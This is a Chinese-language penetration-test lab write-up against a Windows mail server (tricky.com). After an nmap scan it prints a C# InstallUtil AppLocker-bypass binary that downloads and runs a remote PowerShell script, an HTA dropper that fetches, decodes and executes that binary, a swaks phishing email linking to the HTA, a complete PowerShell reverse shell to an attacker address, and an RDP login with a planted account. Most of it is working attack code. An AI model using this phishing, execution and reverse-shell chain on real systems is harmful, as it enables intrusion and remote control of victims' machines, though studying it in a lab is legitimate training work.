命令:nmap -A -Pn 192.168.243.159
Nmap initial output
Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-07-18 01:28 EDT
Nmap scan report for 192.168.243.159
Host is up (0.21s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail01.tricky.com, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
**80/tcp open http Microsoft IIS httpd 10.0**
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: **Tricky.com Mail system information**
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP UIDL USER
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: completed IMAP4rev1 RIGHTS=texkA0001 OK SORT CHILDREN NAMESPACE CAPABILITY QUOTA ACL IDLE IMAP4
445/tcp open microsoft-ds?
587/tcp open smtp hMailServer smtpd
| smtp-commands: **mail01.tricky.com**, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
**3389/tcp open ms-wbt-server Microsoft Terminal Services**
| ssl-cert: Subject: commonName=mail01.tricky.com
| Not valid before: 2022-03-20T12:45:14
|_Not valid after: 2022-09-19T12:45:14
| rdp-ntlm-info:
| Target_Name: TRICKY
| NetBIOS_Domain_Name: TRICKY
| NetBIOS_Computer_Name: MAIL01
| DNS_Domain_Name: tricky.com
| DNS_Computer_Name: mail01.tricky.com
| DNS_Tree_Name: tricky.com
| Product_Version: 10.0.17763
|_ System_Time: 2022-07-18T05:29:24+00:00
|_ssl-date: 2022-07-18T05:29:34+00:00; 0s from scanner time.
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
No OS matches for host
Network Distance: 2 hops
Service Info: Host: mail01.tricky.com; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-07-18T05:29:27
|_ start_date: N/A
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 205.64 ms 192.168.49.1
2 205.70 ms 192.168.243.159
OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 62.41 seconds
访问80端口:
从首页描述看,有杀毒软件,并且没有安装Office,这样基于office的钓鱼没戏了。尝试用hta进行钓鱼。参照P280,Bypass Applocker代码如下:
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Nothing going on in this binary.");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
String cmd = "(New-Object Net.WebClient).DownloadString('<http://192.168.49.243/rev.ps1>') | iex";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
hta代码可以使用如下所示:
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("powershell iwr -uri <http://192.168.49.243/enc.txt> -outfile C:\\\\Windows\\\\Tasks\\\\enc.txt;powershell certutil -decode C:\\\\Windows\\\\Tasks\\\\enc.txt C:\\\\Windows\\\\Tasks\\\\clm.exe; C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\InstallUtil.exe /logfile= /LogToConsole=false /U C:\\\\Windows\\\\Tasks\\\\clm.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
使用swaks给[email protected]发一封钓鱼邮件:
swaks --body 'Please click here [<http://192.168.49.243/rev.hta>](<http://192.168.49.243/rev.hta>)' --header "Subject: Issues with mail" --to [[email protected]](<mailto:[email protected]>) --from [[email protected]](<mailto:[email protected]>) --server 192.168.243.159
考虑到可能存在AV或Windows Defender,这里使用Online Reverse Shell Generetor网站上生成一句话Powershell。(用之前过最新WIndows Defender的Reverse Shell发现无法反弹,杀毒软件也没查杀,不知道问题所在,有点迷,生成的一句话Powershell 反弹shell竟然不被杀,也是神奇)
反弹shell如下所示:
$TCPClient = New-Object Net.Sockets.TCPClient('192.168.49.243', 443);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
获取的反弹shell如下:
发现内网地址为172.16.243.155。
用新创建的用户凭证3389登录159。
rdesktop -d [tricky.com](<http://tricky.com/>) -u crack -p Passw0rd! 192.168.64.159